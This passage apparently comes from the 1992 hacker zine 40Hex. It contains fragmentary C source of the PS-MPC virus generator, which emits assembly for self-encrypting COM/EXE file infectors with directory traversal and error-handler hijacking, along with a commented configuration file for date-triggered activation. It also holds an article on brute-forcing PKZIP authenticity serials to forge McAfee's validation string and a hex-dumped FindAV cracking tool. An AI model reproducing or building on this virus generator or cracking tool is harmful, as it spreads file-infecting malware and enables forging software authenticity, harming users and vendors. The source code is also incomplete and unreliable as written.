          char temp=(char)getnumber(line,d,',',d);
          if ((temp < 1) || (temp > 12))
            printf("Invalid month: %d.  Must range between 1 and 12.\n",temp);
          else {
            tempint = temp*0x100;
            if ((temp < 1) || (temp > 31))
              printf("Invalid day: %d.  Must range between 1 and 31.\n",temp);
            } else {
              config.activate.monthday=tempint + temp;
              setplusminus((char *)&config.plusminus.monthday,*d);

        else if (!stricmp(c,"ifhour"))

        else if (!stricmp(c,"ifminute"))

        else if (!stricmp(c,"ifsecond"))

        else if (!stricmp(c,"percentage"))

        else if (!isspace(c))
          printf("Error in line %d: Invalid parameter '%s'.\n",line,c);

unsigned int getnumber(int line,char *d,char ok,char *next)
  int temp = 0;
  while (isdigit(*d))
  if ((ok == '+') && (!((*d == '+') || (*d == '-'))) && !isspace(*d))
    if (next) *next=*d;
  return temp;

char getyn(int line,char *d)
  switch (toupper(*d))
    case 'Y' : return 1;
    case 'N' : return 0;
    default  : printerror(line,*d);
  return 0;

void setplusminus(char *a, char b)
    if (b == '+')
      *a = 1;
    else if (b == '-')
      *a = -1;
      *a = 0;

void parseactivate(int line, char *d, char min, char max, char *a, char *b, char *s)
  char *c=d;
  char temp = (char)getnumber(line,d,'+',c);
  if ((temp < min) || (temp > max))
    printf("Invalid %s specified: %d.  Range must be between %d & %d.\n",s,temp,min,max);
  else {
    *a = temp;
    if (b != 0) setplusminus(b,*c);

void printerror(int line, char c)
  printf("Error in line %d: Invalid character '%c'.\n",line,c);

void printblank(void)
void getDBname(char *orig, char *name,char *delim)
  *delim = '\'';
  orig[strlen(orig)-1] = 0;
  if (strchr(orig,'\''))
    if (strchr(orig,'\"')) {
      *delim = 0;
      printf("Error in %s: Both single and double quotes used.",orig);
      *delim = '\"';
  if (*delim)
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_messages(void)
    char b[80];
    addvar("creator","db '[MPC]',0","Mass Produced Code Generator");
    if (config.virusname[0]) {
      sprintf(b,"db %c%s%c,0",config.virusnamedelim, config.virusname,
    if (config.authorname[0]) {
      sprintf(b,"db %c%s%c,0",config.authornamedelim, config.authorname,
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void return_EXE(void);
void return_COM(void);

void code_return(void)
  char s[80];
  if (config.activation)
  if (config.p.int24)
    print("mov  ax,2524h","Restore int 24 handler");
    print("lds  dx,[bp+offset oldint24]","to original");
    print("int  21h","");
    print("push cs","");
    print("pop  ds","");
  if (config.p.traverse == DOT_DOT) {
    print("mov  ah,3bh","change directory");
    print("lea  dx,[bp+origdir-1]","original directory");
    print("int  21h","");
  print("mov  ah,1ah","restore DTA to default");
  print("mov  dx,80h","DTA in PSP");
  if (config.p.infectEXE)
    if (config.p.infectCOM)
      print("cmp  sp,id-4","EXE or COM?");
      print("jz   returnEXE","");
    } else /* EXE only */
  } else
    addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file");

void return_EXE(void)
  print("pop  es","");
  print("pop  ds","");
  print("int  21h","");
  print("mov  ax,es","AX = PSP segment");
  print("add  ax,10h","Adjust for PSP");
  print("add  word ptr cs:[bp+jmpsave+2],ax","");
  print("add  ax,word ptr cs:[bp+stacksave+2]","");
  print("cli","Clear intrpts for stack manipulation");
  print("mov  sp,word ptr cs:[bp+stacksave]","");
  print("mov  ss,ax","");
  print("db   0eah","jmp ssss:oooo");
  addvar("jmpsave","dd ?","Original CS:IP");
  addvar("stacksave","dd ?","Original SS:SP");
  if (config.p.infectCOM) {
    addvar("jmpsave2","db ?","Actually four bytes");
    addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file");
  } else
    addvar("jmpsave2","dd 0fff00000h","Needed for carrier file");
  addvar("stacksave2","dd ?","");

void return_COM(void)
  print("int  21h","");
  print("retn","100h is on stack");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void restore_COM(void);
void restore_EXE(void);

void code_setup(void)
  addheap("buffer","db 1ah dup (?)","read buffer");
  if (!config.p.encrypt)
    printlabel("startvirus:","virus code starts here");
  print("call next","calculate delta offset");
  printlabel("next:     pop  bp","bp = IP next");
  print("sub  bp,offset next","bp = delta offset");
  if (config.p.infectEXE)
    if (config.p.infectCOM) /* COM & EXE */
      print("cmp  sp,id","COM or EXE?");
      print("je   restoreEXE","");
      print("jmp  short restoreEXIT","");
    } else /* EXE ONLY */
  } else

  if (config.maxinfect)
    char b[80];
    addheap("numinfec","db ?","Infections this run");
    sprintf(b,"mov  byte ptr [bp+numinfec],%u",config.maxinfect);
    print(b,"reset infection counter");
  print("mov  ah,1Ah","Set new DTA");
  print("lea  dx,[bp+newDTA]","new DTA @ DS:DX");
  print("int  21h","");
  addheap("newDTA","db 43 dup (?)","Temporary DTA");
  if (config.p.traverse == DOT_DOT)
    print("mov  ah,47h","Get current directory");
    print("mov  dl,0","Current drive");
    print("lea  si,[bp+origdir]","DS:SI->buffer");
    print("int  21h","");
    print("mov  byte ptr [bp+backslash],'\\'","Prepare for later CHDIR");
    addheap("origdir","db 64 dup (?)","Current directory buffer");
    addheap("backslash","db ?","");
  if (config.p.int24)
    addheap("oldint24","dd ?","Storage for old int 24h handler");
    print("mov  ax,3524h","Get int 24 handler");
    print("int  21h","to ES:BX");
    print("mov  word ptr [bp+oldint24],bx","Save it");
    print("mov  word ptr [bp+oldint24+2],es","");
    print("mov  ah,25h","Set new int 24 handler");
    print("lea  dx,[bp+offset int24]","DS:DX->new handler");
    print("int  21h","");
    print("push cs","Restore ES");
    print("pop  es","'cuz it was changed");

void restore_EXE(void)
  print("push ds","");
  print("push es","");
  print("push cs","DS = CS");
  print("pop  ds","");
  print("push cs","ES = CS");
  print("pop  es","");
  print("lea  si,[bp+jmpsave2]","");
  print("lea  di,[bp+jmpsave]","");
  if (!config.p.infectCOM)

void restore_COM(void)
  print("lea  si,[bp+save3]","");
  print("mov  di,100h","");
  print("push di","For later return");
  if (!config.p.infectEXE)
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_subroutines(void)
  print("mov  ah,3dh","");
  print("lea  dx,[bp+newDTA+30]","filename in DTA");
  print("int  21h","");
  print("xchg ax,bx","");
  print("mov  ax,4301h","Set attributes to cx");
  print("lea  dx,[bp+newDTA+30]","filename in DTA");
  print("int  21h","");
  if (config.p.encrypt)
    print("pop  bx","Restore file handle");
    print("pop  bp","Restore relativeness");
    print("mov  ah,40h","Write to file");
    print("lea  dx,[bp+decrypt]","Concatenate virus");
    print("mov  cx,heap-decrypt","# bytes to write");
    print("int  21h","");
    print("push bx","");
    print("push bp","");
  if (config.p.int24)
    printlabel("int24:","New int 24h (error) handler");
    print("mov  al,3","Fail call");
    print("iret","Return control");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_tail(void)
  if (config.p.infectCOM)
    printlabel("end       entry_point","");
    if (config.p.encrypt)
      printlabel("end       decrypt","");
      printlabel("end       startvirus","");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_traversal_generic(void);
void dot_dot(void);
void lea_exe(void);
void lea_com(void);

void code_traversal(void)
  config.p.calls_check = 0;
  switch (config.p.traverse)
    case NONE:    code_traversal_generic(); break;
    case DOT_DOT: printlabel("dir_scan:","\"dot dot\" traversal");

void code_traversal_generic(void)
  if (config.p.infectEXE) {
    if (!config.p.infectCOM)
  if (config.p.infectCOM) {
    if (config.p.infectEXE)

void lea_exe(void)
  print("lea  dx,[bp+exe_mask]","");
  if (config.p.infectCOM)
    print("call infect_mask","");

void lea_com(void)
  print("lea  dx,[bp+com_mask]","");
  if (config.p.infectEXE)
    print("call infect_mask","");

void dot_dot(void)
  print("mov  ah,3bh","change directory");
  print("lea  dx,[bp+dot_dot]","\"cd ..\"");
  print("int  21h","");
  print("jnc  dir_scan","go back for mo!");
----------------------------------- Cut Here ----------------------------------
/* FILE: VVAR.C */
#include "vheader.h"

void code_variables(void)
  if (config.p.infectEXE) addvar("exe_mask","db '*.exe',0","");
  if (config.p.infectCOM) addvar("com_mask","db '*.com',0","");
  if (config.p.traverse == DOT_DOT)
    addvar("dot_dot","db '..',0","");
----------------------------------- Cut Here ----------------------------------
; Skeleton configuration file for PS-MPC version 0.90?
; Lines beginning with semicolons denote comments

; Required parameters:

; Filename = <string>
; This is the filename to be generated by PS-MPC as the source code file.
Filename = target.asm

; Infect = (C,E)
; Note: You can mix the two, a la "Infect = C,E"  Do not use a space to
;       deliminate the two parameters.
Infect = C,E

; Optional parameters - Defaults are shown in square brackets

; Traversal = <N,D>
; ([None], Dot Dot)
; If None is specified, then only the files in the current directory will be
; infected.  If Dot dot is specified, then files in the current directory and
; subdirectories below the current will be infected.
Traversal = N

; Encrypted = <Y,N>
; (Yes, [No])
; Only turn off encryption if you wish to limit the size of the virus.
Encryption = Y

; IDWord = XX
; ([  ],XX)
; The IDWord consists of two characters which are used to identify already
; infected EXE files.  This line is not needed in COM-only infectors.  Do
; not use an apostrophe or the source code will not assemble properly.
IDWord = DA

; MinSize = #
; (A,[0]..65535)
; MinSize is used only in the infection of COM files.  Files under MinSize
; bytes are not infected.  MinSize = 0 turns off this option.  MinSize = A
; indicates use of the virus's effective length as the minimum size.  This
; line is ignored in EXE-specific infectors.
MinSize = 0

; MaxSize = #
; (A,[0]..65535)
; MaxSize is used only in the infection of COM files.  Files above MaxSize
; bytes are not infected.  MaxSize = 0 turns off this option.  MaxSize = A
; indicates automatic calculation of maximum size. This line is not needed
; in EXE-only infectors.
MaxSize = A

; Infections = #
; ([0]..255)
; Infections is an optional counter limiting the number of infections per run
; of the virus to a specific number.  Infections = 0 disables this option.
Infections = 0

; ErrorHandler = <Y,N>
; (Yes, [No])
; ErrorHandler selects if you wish to include a short critical error handler
; in the virus.  This handler prevents Abort, Retry, Fail messages by taking
; over the critical error interrupt.  Attempted infection of files on write-
; protected diskettes will not generate an error if this option is set.
ErrorHandler = Y

; CommandCom = <Y,N>
; (Yes, [No])
; This flag indicates whether you wish the virus to infect COMMAND.COM
; 'Yes' turns off the check for COMMAND.COM, thus saving space.
CommandCom = N

; VirusName = <string>
; The only limitation to the string is that you may not use both the single
; and double quotes together in the string, i.e. the string B'li"p is not
; legal.
VirusName = [Skeleton]

; AuthorName = <string>
; The same constraints apply to AuthorName.
AuthorName = Deke

; AllowZero = <Y,N>
; (Yes, [No])
; This flags whether the virus will allow an encryption value of 0, which
; would effectively leave it in an unencrypted state.  'Yes' disables the
; zero check, thereby shortening code length.
AllowZero = N

; Activation Conditions
; All conditions must be satisfied for activation to occur

; Always = <Y,N>
; (Yes, [No])
; This flags whether the virus always activates, although I can't imagine a
; useful virus that does so.
; Always = N

; IfMonth = #
; <1..12><-,+>
; Activate if the month is equal to the specified number.  Adding a minus sign
; after the month indicates activation before or during the specified month.
; Adding a plus sign after the month indicates activation during or after the
; specified month.
; IfMonth = 11+    ; Activate in either November or December

; IfDay = #
; <1..31><-,+>
; Activate if the date is on a certain date  Adding a minus sign after the day
; indicates activation on or before that day.  Similarly, adding a plus sign
; indicates activation on or after that day.  Note: the program does not check
; to see if the number inputted is a valid date.  For example, combining
; IfMonth=2 and IfDay=30+ will NOT result in an error, although the virus will
; clearly never activate.
; IfDay = 15+         ; Activate after the fifteenth of the month

; IfYear = #
; <0..65535><-,+>
; Activate during a certain year or years.  Don't be stupid and put a
; ridiculous year such as 1-.
; IfYear = 1993+      ; Activate after 1993

; IfDOW = #
; <0..6><-,+>
; 0 = Sunday, 1 = Monday, etc.
; Activate on, before, or after a particular day of the week.
; IfDOW = 0            ; Activate only on Sundays

; IfMonthDay = #,#
; <#,#><-,+>
; Activate on, before, or after a particular day of the year.  This differs
; from the combination of IfMonth and IfDay.
; IfMonthDay = 5,9+    ; Activate only after May 9th
; compare to:
; IfMonth = 5+         ; Activate in May through December, but only if the
; IfDay   = 9+         ; day is on or after the 8th.  July 1st is NOT an
                       ; activation date

; IfHour = #
; <0..23><-,+>
; This should be self-explanatory at this point.
; IfHour = 12          ; Activate any time from 12 noon -> 1 P.M.

; IfMinute = #
; <0..59><-,+>
; Duh.
; IfMinute = 30+

; IfSecond = #
; <0..59><-,+>  ;; check 0
; This is somewhat useless, in my estimation
; IfSecond = 30+

; Percentage = #
; <1..99>
; This uses the 1/100 second counter as a random number.  If the counter is
; less than the percentage, then the virus will activate.
; Percentage = 50      ; Even odds
--------------------------------- Stop Cutting --------------------------------

40Hex Number 8 Volume 2 Issue 4                                       File 002

                Eat PUTAV
                  by Demogorgon of PHALCON/SKISM

     Even though pk-zip 2.0 will be out soon and all the methods in
this article will be obsolete, I decided to write about them anyway.  I
am sure you are familiar with the old program called makeav, which
attempted to brute force hack pkzip registration serial numbers.  Sure,
it worked, but it was quite slow.  Then, Hal released the program
findav, which did the same task several thousand times faster.  Dark
Angel took apart the program findav in order to make a few
modifications.  Naturally, Hal included several routines in his code in
order to make it very difficult to take apart.  Dark Angel captured a
memory image of findav after it loaded into memory, wrote it back to
disk as a com file, and then changed all of the offsets so that all
references to the data segment were changed to their address in the code
segment.  Dark Angel made several modifications, the most important of
which was so that findav would not quit out after finding a serial
number.  The new version finds every serial number, and logs them to

        An Experiment in Distributed Processing

     The next day, Garbageheap and I took the modified findav down to
the nearest university.  We started it running on twenty 80386 systems
on their network, each working on a different segment of the 4 billion
possible serial numbers.  The goal was to find every serial number that
worked for McAfee Associates, so that we could then determine which one
was the one he uses.  When an authenticity verified pkzip file is
extracted, pkunzip generates a 3 letter, 3 number validation string that
is dependent on the serial number used to validate it.  A single
registration name has millions of valid serial numbers, but each of
these serial numbers has one unique validation string.
 For Example:

PKUNZIP (R)    FAST!    Extract Utility    Version 1.1    03-15-90
Copr. 1989-1990 PKWARE Inc. All Rights Reserved. PKUNZIP/h for help
PKUNZIP Reg. U.S. Pat. and Tm. Off.

  Exploding: NUL           -AV

Authentic files Verified!   # ATU314   Zip Source: McAFEE ASSOCIATES

PKUNZIP (R)    FAST!    Extract Utility    Version 1.1    03-15-90
Copr. 1989-1990 PKWARE Inc. All Rights Reserved. PKUNZIP/h for help
PKUNZIP Reg. U.S. Pat. and Tm. Off.

  Exploding: NUL           -AV

Authentic files Verified!   # SXQ414   Zip Source: McAFEE ASSOCIATES

     Therefore, the task was to find which of the serial numbers we had
found for McAfee produces the validation string "NWN405".  To do this,
we ran every serial number through a program called checkav which Dark
Angel wrote to determine what validation number corresponds to which
serial number.  Of course, a task like this would be nearly impossible
on your machine at home, but thanks to my local university, we were able
to use twenty machines at once.

        Yet Another Way To Eat PUTAV
     Because there is never only one way to do something, I decided to
put in another way to get whatever validation string you want out of
pkzip.  All you need to do is include some ^H characters in your
registration name to backspace over the validation string and create a
new one.  Naturally, you can not enter ^H characters when you run
putav, so you enter the correct number of some other character, go
into memory with td, and change them to 08h, the ^H character.  That
way, when pkunzip runs and gives you a validation string, it will
backspace over it and show your own.  For example:


PUTAV - Put Authenticity Verification in PKZIP.EXE
Copyright 1990 PKWARE, Inc.  All rights reserved.

Enter company name exactly as it appears on the PKWARE documentation.
Company Name : ^A^A^A^A^A^A^A^A^A^A^A# BOB666   Earlobe industries
Enter serial number exactly as it appears on the PKWARE documentation.
Serial Number: 23453244


     After typing earlobe industries and hitting return, break into
turbo debug and change the ^A's (01) to ^H's (08).  Remember to put in
11 backspaces.  You can use the same method to find the serial number for
your string with findav.

     The only useful application of all this is to duplicate an existing
pkzip registration.  You could do that before, but now you can do it
better.  Changing the validation string only really makes a difference
if you are trying to duplicate an archive that is known to have a certain
one, like McAfee's.
40Hex Number 8 Volume 2 Issue 4                                       File 003

             -=PHALCON/SKISM=- Presents FindAv P/S Style!
                 PD War Collection Program 2
                      By Hal Of Pheonix
                      Modified by: Dark Angel of PHALCON/SKISM

FindAV version 1.5
Released 27 Jul 92
By Dark Angel of PHALCON/SKISM

In the beginning, there was MakeAV and all its counterparts.  These programs
used a brute-force approach to find PKZIP serial numbers.  They ran PUTAV,
PKZIP, and PKUNZIP repeatedly until a legitimate serial number was found.
Although they worked, these programs required hours, often days of running, as
well as much wear and tear on the hard drive head.  Then FindAV was released

FindAV was many, many times faster than MakeAV.  Instead of running the PKWare
files over and over again, FindAV used an algorithmic approach similar to the
one used by PKWare when calculating serial numbers for registered clients.  It
was a marvelous program, but it, too, had its limitations.  The continual
display of numbers was aesthetically pleasing, but it took much valuable
processor time, slowing down the search for the holy serial number.  E-FindAV
was released, once again speeding the search time by a large factor.  E-FindAV
monitored the running of FindAV, turning off the display until the serial
number was found.  This was a tremendous improvement.  However, the user had
to sit through a tedious, lengthy, entirely unecessary introduction screen
before E-FindAV would execute FindAV. This was unacceptable.  Additionally,
E-FindAV failed to fix some fundamental problems with FindAV.

For one, FindAV stopped after finding the first serial number.  While this is
fine for most people, it is not desirable when finding existing serial
number/validation string combinations.  Second, FindAV had a few bugs.  The
first bug occured only in 386 mode.  FindAV would "miss" some legitimate
serial numbers which it would catch in 8086 mode.  This was, once again,
undesirable when looking for existing serial number/validation string
combinations.  FindAV would also run into an infinite loop in certain
instances in 8086 mode.  This, too, was unacceptable.  Third, FindAV would not
log the serial numbers found in a file. Thus, the user had to manually copy
the number onto a sheet of paper and transfer it to a file for later
reference.  Fourth, FindAV would not let the user start searching for a serial
number from any number except 1000.  If the user wished to find starting from,
say, 2 billion, he or she would be forced to create a MAKEAV.DAT file and
hex-edit the appropriate values.  Last, both FindAV and E-FindAV used
rudimentary disassembly-proof code which precluded users from adding features
to the program.

FindAV version 1.5 fixes these problems.  It is essentially the same program
as the originally released version by HAL of PHOENIX, but with all the fixes
and enhancements mentioned above.

Command line options:
/B - begin at number
You can now start the search from any number, be it 0, 4,294,967,295 or
anything in between.  This serves several purposes.  Should the data file be
corrupted, it is not necessary to hexedit the data file to restart from the
last position.  This option also facilitates the coordinated running of FindAV
on multiple machines.  In this manner, each machine can start the search at a
different point.  The value following the /B overrides the value in the
FindAV.DAT data file.

	FindAV /B ###
	FindAV /B 478293

/S - supress output
Searches may be expedited somewhat with this supress output option.  This
eliminates the unecessary on-screen reporting of a sucessful finding.  Logging
via the AVS.DAT file is preserved.  The 'D'isplay command continues to function
under this mode.

	FindAV /S

Valid keystrokes in FindAV:
ESC - Terminate calculation
Pressing the ESC key causes FindAV to terminate after saving the status of the
run in FindAV.DAT.

'D' - Display
Pressing the 'D' key causes FindAV to display the current search number on the
screen.  This function was originally part of the main loop.  However, it
consumed countless clock cycles, so it was eliminated to save precious time.

Files created by FindAV 1.5:
AVS.DAT - log file
The AVS.DAT file is created by FindAV.  FindAV uses this file to record all
sucessful serial number finds.  It consists of the company name followed by
multiple lines of serial numbers.  If FindAV detects the file in the directory,
it will append serial numbers to the end.

FINDAV.DAT - save file
The FindAV.DAT file is created by FindAV when the user terminates calculation.  It contains the company name as well as the current search number.  It is useful when the user does not wish to search an entire range in one running.  FindAV will automatically resume operation if it detects FindAV in the current directory.
FindAV 1.5 has data file compatability with version 1.0.

Revision history:
1.0 - Unknown - HAL of PHOENIX
    - initial release

1.5 - 27 Jul 92 - Dark Angel of PHALCON/SKISM
    - Bug fixes, peephole optimisation, log file, nonstop action, anynumber
n findav15.com
e 0100  E8 B8 02 74 03 E8 09 00 E8 01 04 B4 4C CD 21 6C
e 0110  01 E8 44 01 75 0F E8 D5 00 BA D9 06 E8 27 04 E8
e 0120  5F 00 E8 84 00 E8 13 00 72 10 BF 06 06 2E FF 16
e 0130  0F 01 73 DD BA F2 06 E8 0C 04 C3 B4 01 CD 16 74
e 0140  1E 2A E4 CD 16 3C 64 74 13 3C 44 74 0F 3C 1B 75
e 0150  0E BA 61 07 E8 EF 03 E8 F1 03 F9 C3 E8 1F 00 F8
e 0160  C3 66 83 3D FF 74 15 66 FF 05 F8 C3 8B 05 8B 55
e 0170  02 40 75 03 42 74 05 AB 92 AB F8 C3 F9 C3 E8 6D
e 0180  00 E8 5F 00 BA AD 07 E8 BC 03 C3 B8 01 3D BA 7B
e 0190  08 CD 21 93 C3 BA D5 07 E8 AB 03 E9 6A FF B4 40
e 01A0  BA D0 07 B9 02 00 CD 21 C3 E8 DF FF 73 1B B4 3C
e 01B0  33 C9 CD 21 72 DF E8 D2 FF B4 40 8A 0E 13 06 B5
e 01C0  00 BA 14 06 CD 21 E8 D5 FF B8 02 42 33 C9 99 CD
e 01D0  21 B4 40 B9 0B 00 BA B5 07 CD 21 E8 C0 FF B4 3E
e 01E0  CD 21 C3 B4 02 32 FF 8B 16 49 06 CD 10 C3 FD BF
e 01F0  BF 07 B9 0A 00 80 3E 05 06 00 74 24 66 A1 06 06
e 0200  66 BB 0A 00 00 00 66 33 D2 66 0B C0 75 06 B0 20
e 0210  F3 AA FC C3 66 F7 F3 92 04 30 AA 92 E2 E8 FC C3
e 0220  88 0E C2 07 A1 06 06 8B 16 08 06 EB 06 8B 46 02
e 0230  8B 56 04 0B C0 75 08 0B D2 75 04 B0 20 EB 10 6A
e 0240  0A 52 50 E8 3C 01 89 4E 04 89 46 02 92 04 30 AA
e 0250  FE 0E C2 07 75 D7 FC C3 E8 3E 01 E8 D8 00 75 07
e 0260  E8 05 00 75 02 32 C0 C3 BF 0A 06 C7 06 C1 07 00
e 0270  0A 80 3E 05 06 00 74 24 66 8B 05 66 C1 C8 10 66
e 0280  B9 0A 00 00 00 66 0B C0 74 50 66 33 D2 66 F7 F1
e 0290  00 16 C1 07 FE 0E C2 07 75 EB EB 3E C7 45 04 9A
e 02A0  3B C7 45 06 00 CA FF 75 04 FF 75 06 FF 35 FF 75
e 02B0  02 E8 2C 00 6A 0A 52 50 E8 C7 00 00 16 C1 07 B8
e 02C0  0A 00 99 52 50 FF 75 04 FF 75 06 E8 12 00 89 55
e 02D0  04 89 45 06 FE 0E C2 07 75 CC 80 3E C1 07 3E C3
e 02E0  55 8B EC 8B 4E 0A E3 38 8B 5E 08 8B 56 06 8B 46
e 02F0  04 D1 E9 D1 DB D1 EA D1 D8 0B C9 75 F4 F7 F3 8B
e 0300  F0 F7 66 0A 91 8B 46 08 F7 E6 03 D1 72 0C 3B 56
e 0310  06 77 07 72 06 3B 46 04 76 01 4E 33 D2 96 EB 12
e 0320  8B 4E 08 8B 46 06 33 D2 F7 F1 8B 5E 04 93 F7 F1
e 0330  8B D3 5D C2 08 00 B9 07 00 BB 9D 00 BF 0A 06 EB
e 0340  1E 80 3E 05 06 00 74 17 66 D3 0D 66 8B 05 66 33
e 0350  D2 F7 F3 66 C1 C8 10 66 83 E8 1A F7 F3 EB 20 8B
e 0360  15 8B 45 02 8B F0 D1 EE D1 DA D1 D8 E2 F8 89 15
e 0370  89 45 02 2D 1A 00 83 DA 00 53 52 50 E8 03 00 0B
e 0380  D2 C3 55 8B EC 8B 5E 08 8B 46 06 33 D2 F7 F3 8B
e 0390  4E 04 91 F7 F3 5D C2 06 00 BE 06 06 AD 89 44 02
e 03A0  AD 89 44 02 BE 14 06 32 ED 8A 0E 13 06 33 DB AC
e 03B0  30 87 0A 06 43 80 E3 03 E2 F5 C3 BA 4B 06 E8 85
e 03C0  01 E8 48 01 E8 0A 02 E8 22 00 E8 D4 00 80 3E 13
e 03D0  06 00 75 03 E8 5B 01 33 F6 E8 37 01 80 3E 13 06
e 03E0  00 75 08 BA 41 07 E8 5D 01 32 C0 C3 BE 81 00 AC
e 03F0  3C 0D 74 37 3C 2F 75 F7 AC E8 86 00 3C 53 75 13
e 0400  B8 90 00 BF 19 01 B9 09 00 F3 AA BA 83 08 E8 35
e 0410  01 EB DC 3C 42 74 15 3C 3F 75 05 BA 0E 09 EB 5D
e 0420  A2 0A 09 BA F6 08 E8 1D 01 EB C4 C3 32 E4 33 DB
e 0430  B9 0A 00 99 AC E8 62 00 74 FA E8 50 00 74 05 BA
e 0440  A3 08 EB 39 50 92 F7 E1 50 93 F7 E1 5B 03 D3 5B
e 0450  03 C3 83 D2 00 93 AC E8 33 00 74 E8 4E 89 1E 06
e 0460  06 89 16 08 06 E8 86 FD BA E2 08 E8 D8 00 BA B3
e 0470  07 E8 D2 00 BA D2 07 E8 CC 00 E9 72 FF E8 C6 00
e 0480  CD 20 3C 61 7C 06 3C 7A 7F 02 04 E0 C3 3C 30 7C
e 0490  08 3C 39 7F 04 2C 30 3A C0 C3 3C 20 74 02 3C 3D
e 04A0  C3 E8 D3 00 72 65 BA 51 08 E8 9A 00 B9 05 00 E8
e 04B0  DA 00 72 54 8B F2 AD 3D 41 56 75 46 AD 3D 31 30
e 04C0  75 40 BA 14 06 8A 0C E8 C2 00 72 3C 83 3E 08 06
e 04D0  00 75 12 81 3E 06 06 E8 03 75 0A BA 06 06 B1 04
e 04E0  E8 A9 00 72 1D AC A2 13 06 98 91 BE 14 06 BF 31
e 04F0  08 F3 A4 B8 0D 0A AB B0 24 AA BA 21 08 E8 46 00
e 0500  EB 06 BA 31 08 E8 3E 00 E8 78 00 C3 BE 01 00 E8
e 0510  01 00 C3 E8 11 00 B4 01 0B F6 75 05 80 CD 20 EB
e 0520  03 80 E5 DF CD 10 C3 B4 03 32 FF CD 10 89 16 49
e 0530  06 C3 BA 98 07 E8 0E 00 B4 0A BA 12 06 CD 21 BA
e 0540  D0 07 E8 01 00 C3 B4 09 CD 21 C3 E8 6C 00 72 26
e 0550  BF 4B 06 B8 41 56 AB B8 31 30 AB BE 13 06 AC AA
e 0560  98 8B C8 F3 A4 BE 06 06 A5 A5 04 09 91 BA 4B 06
e 0570  E8 31 00 E8 0D 00 C3 B8 00 3D BA C3 07 CD 21 A3
e 0580  CE 07 C3 B4 3E 8B 1E CE 07 CD 21 C3 B4 3F 8B 1E
e 0590  CE 07 CD 21 72 06 3B C1 75 02 F8 C3 BA 06 08 E8
e 05A0  A4 FF F9 C3 B4 40 8B 1E CE 07 CD 21 73 0B 3B C1
e 05B0  74 07 BA EE 07 E8 8E FF F9 C3 B4 3C 33 C9 BA C3
e 05C0  07 CD 21 73 08 BA D5 07 E8 7B FF F9 C3 A3 CE 07
e 05D0  C3 9C 58 25 FF 0F 50 9D 9C 58 25 00 F0 3D 00 F0
e 05E0  74 22 9C 58 0D 00 70 50 9D 9C 58 25 00 70 3D 00
e 05F0  70 75 11 FE 06 05 06 2E C7 06 0F 01 61 01 BA 2E
e 0600  07 E8 42 FF C3 00 E8 03 00 00 00 00 00 00 00 00
e 0610  00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0620  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0630  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0640  00 00 00 00 00 00 00 00 00 00 00 50 72 6F 67 72
e 0650  61 6D 20 74 6F 20 66 69 6E 64 20 73 65 72 69 61
e 0660  6C 20 23 20 66 6F 72 20 41 56 20 20 76 65 72 20
e 0670  31 2E 35 0D 0A 76 65 72 20 31 2E 30 20 3C 20 62
e 0680  79 20 48 41 4C 20 66 6F 72 20 50 48 4F 45 4E 49
e 0690  58 20 3E 0D 0A 76 65 72 20 31 2E 35 20 62 79 20
e 06A0  44 61 72 6B 20 41 6E 67 65 6C 20 6F 66 20 50 48
e 06B0  41 4C 43 4F 4E 2F 53 4B 49 53 4D 0D 0A 50 72 65
e 06C0  73 73 20 45 53 43 20 74 6F 20 65 78 69 74 20 70
e 06D0  72 6F 67 72 61 6D 0D 0A 24 0D 0A 53 65 72 69 61
e 06E0  6C 20 6E 75 6D 62 65 72 20 66 6F 75 6E 64 21 0D
e 06F0  0A 24 0D 0A 46 69 6E 64 41 56 20 63 6F 6D 70 6C
e 0700  65 74 65 64 2E 20 20 4E 6F 20 6D 6F 72 65 20 73
e 0710  65 72 69 61 6C 20 6E 75 6D 62 65 72 73 20 6D 61
e 0720  79 20 62 65 20 66 6F 75 6E 64 2E 0D 0A 24 33 38
e 0730  36 20 43 50 55 20 64 65 74 65 63 74 65 64 0D 0A
e 0740  24 4E 6F 20 69 6E 70 75 74 2C 20 61 62 6F 72 74
e 0750  69 6E 67 20 6F 70 65 72 61 74 69 6F 6E 21 0D 0A
e 0760  24 0D 0A 45 53 43 20 6B 65 79 20 64 65 74 65 63
e 0770  74 65 64 2C 20 73 61 76 69 6E 67 20 46 49 4E 44
e 0780  41 56 2E 44 41 54 20 61 6E 64 20 65 78 69 74 69
e 0790  6E 67 2E 2E 2E 0D 0A 24 45 6E 74 65 72 20 63 6F
e 07A0  6D 70 61 6E 79 20 6E 61 6D 65 3A 20 24 54 72 79
e 07B0  69 6E 67 20 23 20 20 20 20 20 20 20 20 20 20 20
e 07C0  24 00 00 46 49 4E 44 41 56 2E 44 41 54 00 00 00
e 07D0  0D 0A 0D 0A 24 0D 0A 45 72 72 6F 72 20 63 72 65
e 07E0  61 74 69 6E 67 20 66 69 6C 65 21 0D 0A 24 0D 0A
e 07F0  45 72 72 6F 72 20 77 72 69 74 69 6E 67 20 66 69
e 0800  6C 65 21 0D 0A 24 0D 0A 45 72 72 6F 72 20 69 6E
e 0810  20 72 65 61 64 69 6E 67 20 66 69 6C 65 21 0D 0A
e 0820  24 43 6F 6E 74 69 6E 75 69 6E 67 20 66 6F 72 3A
e 0830  20 42 61 64 20 66 69 6C 65 20 68 65 61 64 65 72
e 0840  20 69 6E 20 46 49 4E 44 41 56 2E 44 41 54 0D 0A
e 0850  24 46 49 4E 44 41 56 2E 44 41 54 20 64 65 74 65
e 0860  63 74 65 64 2C 20 72 65 61 64 69 6E 67 20 69 6E
e 0870  20 64 61 74 61 2E 2E 2E 0D 0A 24 41 56 53 2E 44
e 0880  41 54 00 53 75 70 70 72 65 73 73 69 6F 6E 20 6F
e 0890  66 20 6F 75 74 70 75 74 20 61 63 74 69 76 65 2E
e 08A0  0D 0A 24 46 61 74 61 6C 20 65 72 72 6F 72 20 69
e 08B0  6E 20 70 61 72 61 6D 65 74 65 72 20 42 45 47 49
e 08C0  4E 2E 0D 0A 50 72 6F 70 65 72 20 75 73 61 67 65
